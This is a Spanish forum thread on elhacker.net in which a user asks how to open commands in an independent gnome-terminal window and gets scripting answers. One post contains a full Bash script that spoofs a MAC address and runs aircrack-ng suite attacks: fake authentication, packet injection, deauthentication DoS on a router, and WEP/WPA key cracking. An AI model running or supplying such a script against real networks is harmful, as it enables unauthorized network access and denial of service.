elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Bash script] Introducir comando en una nueva terminal (SOLUCIONADO)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [Bash script] Introducir comando en una nueva terminal (SOLUCIONADO)  (Leído 14,071 veces)
moikano→@


Desconectado Desconectado

Mensajes: 572


Cultiva tu mente y cuerpo, son tu única propiedad


Ver Perfil WWW
[Bash script] Introducir comando en una nueva terminal (SOLUCIONADO)
« en: 28 Octubre 2010, 15:47 pm »

Necesito saber si existe algún comando para ejecutar una orden y que se ejecute en una ventana nueva sin alterar la ventana padre (por decirlo de alguna forma).
Es decir:
ifconfig -a # se ejecuta en la terminal de origen
ifconfig # se ejecuta en la nueva terminal sin alterar la terminal de origen de ifconfig -a

No se si me explique muy bien. Googleando encontré alguna respuesta pero es un apaño un poco cutre, no me gusta mucho, queria saber si hay otra opción.

lo que e encontrado se trata de que el primer script llame al segundo:

Primer script (p.sh):

#!/bin/bash
gnome-terminal -e "bash script.sh"

Segundo script (script.sh):

#!/bin/bash
ls /home/usuario/Escritorio
sleep 5

Ejecución:

bash p.sh

------Lo que yo quiero es que no se necesite tener dos scripts diferentes.


« Última modificación: 18 Noviembre 2010, 16:04 pm por moikanolaplana » En línea

moikano→@


Desconectado Desconectado

Mensajes: 572


Cultiva tu mente y cuerpo, son tu única propiedad


Ver Perfil WWW
Re: [Bash script] Introducir comando en una nueva terminal
« Respuesta #1 en: 1 Noviembre 2010, 18:38 pm »

Nadie tiene una idea de como hacerlo?  :-\


En línea

leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: [Bash script] Introducir comando en una nueva terminal
« Respuesta #2 en: 2 Noviembre 2010, 00:14 am »

Nadie tiene una idea de como hacerlo?  :-\

Tranquilo que también tenemos vidas sociales.


Código
  1. #!/bin/bash
  2. ifconfig -a
  3. gnome-terminal -x bash -c "ls|less"
  4.  
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
moikano→@


Desconectado Desconectado

Mensajes: 572


Cultiva tu mente y cuerpo, son tu única propiedad


Ver Perfil WWW
Re: [Bash script] Introducir comando en una nueva terminal
« Respuesta #3 en: 2 Noviembre 2010, 08:45 am »

Disculpa Leo, solo quería revivír el mensaje.
Gracias =) voy a probarlo.
En línea

leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: [Bash script] Introducir comando en una nueva terminal
« Respuesta #4 en: 2 Noviembre 2010, 19:17 pm »

De nada.  ;)
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
moikano→@


Desconectado Desconectado

Mensajes: 572


Cultiva tu mente y cuerpo, son tu única propiedad


Ver Perfil WWW
Re: [Bash script] Introducir comando en una nueva terminal
« Respuesta #5 en: 3 Noviembre 2010, 19:20 pm »

Ey! si que funciona. Gracias de nuevo Leo =) como siempre das en el clavo.  ;-)
En línea

leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: [Bash script] Introducir comando en una nueva terminal (SOLUCIONADO)
« Respuesta #6 en: 4 Noviembre 2010, 01:42 am »

De nada. Aquí estamos.
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
moikano→@


Desconectado Desconectado

Mensajes: 572


Cultiva tu mente y cuerpo, son tu única propiedad


Ver Perfil WWW
Re: [Bash script] Introducir comando en una nueva terminal (SOLUCIONADO)
« Respuesta #7 en: 4 Noviembre 2010, 20:51 pm »

He estado probando dentro del script al que queria agregarlo y no me a dado el resultado que queria :-\.
Se abre una terminal con el comando que le digo, pero esta no es independiente de la terminal padre ( por así decirlo).
Es decir, cuando ejecuto el comando "gnome-terminal -x bash -c ifconfig" me saca una nueva ventana de terminal pero en la que e introducido el código se queda esperando a que la otra acabe y si hago un ctrl+c a cualquiera de las dos se para la que se ha abierto nueva.

Os pongo el código completo por si es otra cosa la que se me escapa:

Código
  1. #!/bin/bash
  2. iwconfig
  3.  read -p 'introduce el interfaz a usar: ' inter
  4. airmon-ng start $inter
  5.  read -n 4 -p 'introduce el monitor que utilizaras para cambiar su mac: ' mon
  6. ifconfig $mon down
  7. macchanger -m aa:00:aa:00:aa:00 $mon
  8. $macmon == aa:00:aa:00:aa:00
  9. echo 'pulsa control+c cuando veas la red'
  10.   airodump-ng $mon
  11. trap 'ataques' EXIT;
  12.      function ataques()
  13.             {
  14.                 read -p 'introduce el nombre de la red: ' nom ;
  15.                 read -n 17 -p 'introduce la mac: ' mac ;
  16.                 read -n 2 -p 'introduce su canal: ' can ;
  17.                      gnome-terminal -x bash -c "airodump-ng -w $nom -c $can --bssid $mac $mon" ;
  18.                 while [ $SALIR=1 ] ; do
  19.                 read -p 'indica que ataque quieres iniciar:
  20.                          -Autentificacion (1) -Captura de paquetes (2) -DoS a router (3) -Sacar clave (4) -salir (5) : ' ata ;
  21.                 case $ata in
  22.                      1) gnome-terminal -x bash -c "aireplay-ng -1 0 -e $nom -a $mac -h $macmon $mon" ;;
  23.                      2) gnome-terminal -x bash -c "aireplay-ng -3 -e $nom -a $mac -h $macmon $mon" ;;
  24.                      3) gnome-terminal -x bash -c "aireplay-ng -0 0 -e $nom -a $mac $mon" ;;
  25.                      4) gnome-terminal -x bash -c "aircrack-ng ./$nom*.cap" ;;
  26.                      5) break ;;
  27.                      *) echo 'lo escrito no es correcto'
  28.                 esac
  29.                 done
  30.              }

el problema esta en la linea
Código
  1. gnome-terminal -x bash -c "airodump-ng -w $nom -c $can --bssid $mac $mon"

Me abre la nueva terminal con este comando pero no me deja hacer nada en la terminal de origen.

No hay alguna otra manera de que la terminal nueva sea totalmente independiente de la terminal de origen?
En línea

moikano→@


Desconectado Desconectado

Mensajes: 572


Cultiva tu mente y cuerpo, son tu única propiedad


Ver Perfil WWW
Re: [Bash script] Introducir comando en una nueva terminal
« Respuesta #8 en: 17 Noviembre 2010, 15:45 pm »

Alguien tiene alguna idea?
En línea

leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: [Bash script] Introducir comando en una nueva terminal
« Respuesta #9 en: 18 Noviembre 2010, 01:33 am »

Prueba:
Código
  1. gnome-terminal -x bash -c "airodump-ng -w $nom -c $can --bssid $mac $mon" &
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines